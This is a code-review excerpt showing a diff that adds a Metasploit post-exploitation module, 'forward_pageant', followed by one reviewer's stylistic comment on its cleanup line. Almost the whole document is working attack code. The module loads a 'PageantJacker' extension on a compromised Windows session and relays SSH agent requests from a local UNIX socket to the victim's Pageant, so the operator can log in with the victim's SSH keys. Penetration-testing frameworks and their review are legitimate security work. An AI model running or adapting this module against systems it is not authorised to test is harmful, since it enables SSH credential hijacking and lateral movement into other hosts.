modules/post/windows/manage/forward_pageant.rb

```diff
@@ -0,0 +1,105 @@
+                     ))
+    register_options(
+      [
+        OptString.new('SocketPath', [false, 'Specify a filename for the local UNIX socket.', nil])
+      ], self.class)
+  end
+
+  def run
+
+    # Check to ensure that UNIX sockets are supported
+    begin
+      ::UNIXServer
+    rescue NameError
+      print_error("This module is only supported on a Metasploit installation that supports UNIX sockets.")
+      return false
+    end
+
+    # Attempt to load the pageantjacker extension if it isn't already loaded.
+    unless session.pageantjacker
+      print_status("Loading PageantJacker extension on session #{session.sid} (#{session.session_host})")
+      session.core.use("pageantjacker")
+    end
+
+    # Fail if it cannot be loaded
+    unless session.pageantjacker
+      print_error("Failed to load PageantJacker on session #{session.sid} (#{session.session_host})")
+      return false
+    end
+
+    # Get the socket path from the user supplied options (or leave it blank to get the plugin to choose one)
+    if datastore['SocketPath']
+      @sockpath = datastore['SocketPath'].to_s
+    else
+      @sockpath = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('pageantjacker', 5)}"
+    end
+
+    # Quit if the file exists, so that we don't accidentally overwrite something important on the host system
+    if ::File.exist?(@sockpath)
+      print_error("Your requested socket (#{@sockpath}) already exists. Remove it or choose another path and try again.")
+      return false
+    end
+
+    # Open the socket and start listening on it. Essentially now forward traffic between us and the remote Pageant instance.
+    ::UNIXServer.open(@sockpath) do |serv|
+      print_status("Launched listening socket on #{@sockpath}")
+      print_status("Set SSH_AUTH_SOCK variable to #{@sockpath} (e.g. export SSH_AUTH_SOCK=\"#{@sockpath}\")")
+      print_status("Now use any tool normally (e.g. ssh-add)")
+
+      loop do
+        s = serv.accept
+        loop do
+          socket_request_data = s.recvfrom(8192) # 8192 = AGENT_MAX
+          break if socket_request_data.nil? || socket_request_data.first.nil? || socket_request_data.first.empty?
+          vprint_status("PageantJacker: Received data from socket (size: #{socket_request_data.first.size})")
+          response = client.pageantjacker.forward_to_pageant(socket_request_data.first, socket_request_data.first.size)
+          if response[:success]
+            s.send response[:blob], 0
+            vprint_status("PageantJacker: Response received (Success='#{response[:success]}' Size='#{response[:blob].size}' Error='#{response[:error]}')")
+          else
+            print_error("PageantJacker: Unsuccessful response received (#{response[:error]})")
+          end
+        end
+      end
+    end
+  end
+
+  def cleanup
+    # Remove the socket that we created, if it still exists
+    ::File.delete(@sockpath) if ::File.exist?(@sockpath) if @sockpath
```

Comment:
I'm not sure why it didn't go for:

`::File.delete(@sockpath) if @sockpath && ::File.exist?(@sockpath)`